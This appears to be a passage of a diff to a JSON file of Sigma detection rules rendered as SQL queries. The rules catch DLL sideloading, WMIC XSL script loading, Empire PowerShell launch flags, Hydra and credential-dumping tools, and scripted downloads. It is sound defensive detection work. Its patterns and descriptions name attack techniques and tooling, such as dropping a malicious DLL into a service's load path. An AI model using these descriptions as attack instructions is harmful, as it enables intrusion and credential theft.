"title": "WMIC Loading Scripting Libraries", + "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "status": "test", + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1220" ], "falsepositives": [ - "Legitimate script" + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_quiet.yml" + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" }, { - "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", - "id": "01c42d3c-242d-4655-85b2-34f1739632f7", + "title": "Potential DLL Sideloading Via JsSchHlp", + "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "status": "experimental", - "description": "Detects usage of Dsacls to grant over permissive permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administrators granting over permissive permissions to users" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml" + "filename": "image_load_side_load_jsschhlp.yml" }, { - "title": "Permission Check Via Accesschk.EXE", - "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "falsepositives": [ - "Administrative activity" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" - }, - { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", + "status": "experimental", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Perl Inline Command Execution", - "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "title": "UIPromptForCredentials DLLs", + "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "status": "experimental", - "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Unknown" + "Other legitimate processes loading those DLLs in your environment." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_perl_inline_command_execution.yml" + "filename": "image_load_uipromptforcreds_dlls.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", + "status": "experimental", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "title": "Web Browsers DLL Sideloading", + "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "filename": "image_load_side_load_web_browsers.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Possible but rare" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "title": "Active Directory Kerberos DLL Loaded Via Office Application", + "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Kerberos DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_office_kerberos_dll_load.yml" }, { - "title": "Gpscript Execution", - "id": "1e59c230-6670-45bf-83b0-98903780607e", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "author": "frack113", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate uses of logon scripts distributed via group policy" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_gpscript.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "PowerShell Core DLL Loaded By Non PowerShell Process", + "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "status": "experimental", + "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "tags": [ + "attack.t1059.001", + "attack.execution" + ], "falsepositives": [ - "Administrative activity" + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_dll_system_management_automation_susp_load.yml" }, { - "title": "Suspicious MsiExec Embedding Parent", - "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "title": "System Drawing DLL Load", + "id": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "author": "frack113", + "description": "Detects processes loading \"System.Drawing.ni.dll\". This could be an indicator of potential Screen Capture.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1218.007", - "attack.defense_evasion" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Unknown" + "False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\System.Drawing.ni.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_msiexec_embedding.yml" + "filename": "image_load_dll_system_drawing_load.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": 